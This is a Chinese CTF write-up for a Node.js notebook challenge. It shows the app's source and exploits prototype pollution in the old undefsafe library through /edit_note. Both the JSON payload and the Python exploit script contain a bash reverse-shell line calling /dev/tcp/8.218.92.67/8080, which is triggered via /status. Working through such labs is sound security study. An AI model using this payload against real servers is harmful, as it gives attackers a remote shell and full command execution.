notes_网鼎20

CTF
,

复现平台: buuoj

思路

  1. 分析源码,目标肯定是/status的地方
    1. let in语句可以读取原型链的内容,构造payload"rce": "ls" –> 需要考虑进行带外,因为是输出到标准输出
    2. 可以考虑构造原型链到Object里,有两个目标

      1. 一个是edit_note

        1
        2
        3
        4
        5
        6
        // payloads,可以使用反弹shell实现,本地nc -lvnp 8080
        {
            "id":"__proto__.b",
            "author": "bash -i >& /dev/tcp/8.218.92.67/8080 0>&1",
            "raw" : "h3110 w0r1d"
        }

      2. 一个是write_note

直接源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
var express = require('express');
var path = require('path');
const undefsafe = require('undefsafe');
const { exec } = require('child_process');

var app = express();
class Notes {
    constructor() {
        this.owner = "whoknows";
        this.num = 0;
        this.note_list = {};    // 定义了一个字典,在后面的攻击过程中会用到
    }

    write_note(author, raw_note) {
        this.note_list[(this.num++).toString()] = {"author": author,"raw_note":raw_note};
    }

    get_note(id) {
        var r = {}
        undefsafe(r, id, undefsafe(this.note_list, id));
        return r;
    }

    edit_note(id, author, raw) {
        undefsafe(this.note_list, id + '.author', author);
        undefsafe(this.note_list, id + '.raw_note', raw);
    }

    get_all_notes() {
        return this.note_list;
    }

    remove_note(id) {
        delete this.note_list[id];
    }
}

var notes = new Notes();
notes.write_note("nobody", "this is nobody's first note");


app.set('views', path.join(__dirname, 'views'));
app.set('view engine', 'pug');    // 设置模板引擎为pug

app.use(express.json());
app.use(express.urlencoded({ extended: false }));
app.use(express.static(path.join(__dirname, 'public')));


app.get('/', function(req, res, next) {
  res.render('index', { title: 'Notebook' });
});

app.route('/add_note')
    .get(function(req, res) {
        res.render('mess', {message: 'please use POST to add a note'});
    })
    .post(function(req, res) {
        let author = req.body.author;
        let raw = req.body.raw;
        if (author && raw) {
            notes.write_note(author, raw);
            res.render('mess', {message: "add note sucess"});
        } else {
            res.render('mess', {message: "did not add note"});
        }
    })

app.route('/edit_note')    // 该路由中 undefsafe 三个参数均可控
    .get(function(req, res) {
        res.render('mess', {message: "please use POST to edit a note"});
    })
    .post(function(req, res) {
        let id = req.body.id;
        let author = req.body.author;
        let enote = req.body.raw;
        if (id && author && enote) {
            notes.edit_note(id, author, enote);
            res.render('mess', {message: "edit note sucess"});
        } else {
            res.render('mess', {message: "edit note failed"});
        }
    })

app.route('/delete_note')
    .get(function(req, res) {
        res.render('mess', {message: "please use POST to delete a note"});
    })
    .post(function(req, res) {
        let id = req.body.id;
        if (id) {
            notes.remove_note(id);
            res.render('mess', {message: "delete done"});
        } else {
            res.render('mess', {message: "delete failed"});
        }
    })

app.route('/notes')
    .get(function(req, res) {
        let q = req.query.q;
        let a_note;
        if (typeof(q) === "undefined") {
            a_note = notes.get_all_notes();
        } else {
            a_note = notes.get_note(q);
        }
        res.render('note', {list: a_note});
    })

app.route('/status')    // 漏洞点,只要将字典 commands 给污染了, 就能任意执行我们的命令
    .get(function(req, res) {
        let commands = {
            "script-1": "uptime",
            "script-2": "free -m"
        };
        for (let index in commands) {
            exec(commands[index], {shell:'/bin/bash'}, (err, stdout, stderr) => {
                if (err) {
                    return;
                }
                console.log(`stdout: ${stdout}`);    // 将命令执行结果输出
            });
        }
        res.send('OK');
        res.end();
    })


app.use(function(req, res, next) {
  res.status(404).send('Sorry cant find that!');
});


app.use(function(err, req, res, next) {
  console.error(err.stack);
  res.status(500).send('Something broke!');
});


const port = 8080;
app.listen(port, () => console.log(`Example app listening at http://localhost:${port}`))

*为什么不是write_note?

  1. 这里不行,就算传入__proto__也无法污染原型链,而是直接替换对象,只有在undefsafe()中才可以添加属性进行污染

*undefsafe的原型链污染

  1. 介绍:Undefsafe 是 Nodejs 的一个第三方模块,其核心为一个简单的函数,用来处理访问对象属性不存在时的报错问题。但其在低版本(< 2.0.3)中存在原型链污染漏洞,攻击者可利用该漏洞添加或修改 Object.prototype 属性
  2. 速记
    1. 低版本<2.0.3
    2. undefsafe用来修改/添加属性时防止报错
    3. 2.0.3一下如果当属性不存在时,我们想对该属性赋值,访问属性会在上层进行创建并赋值
  3. 例子

步骤

  1. 直接见script

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    # 在wsl中运行即可
    import requests

    url="http://3f9cde28-54c3-4507-9d88-724e570aee10.node5.buuoj.cn:81"

    payload={
        "id":"__proto__.b",
        "author": "bash -i >& /dev/tcp/8.218.92.67/8080 0>&1",
        "raw" : "h3110 w0r1d"
    }
    print(payload)
    r=requests.post(url+"/edit_note",json=payload,timeout=5)
    print(r.text)
    r=requests.get(url+"/status",timeout=5)
    print(r.text)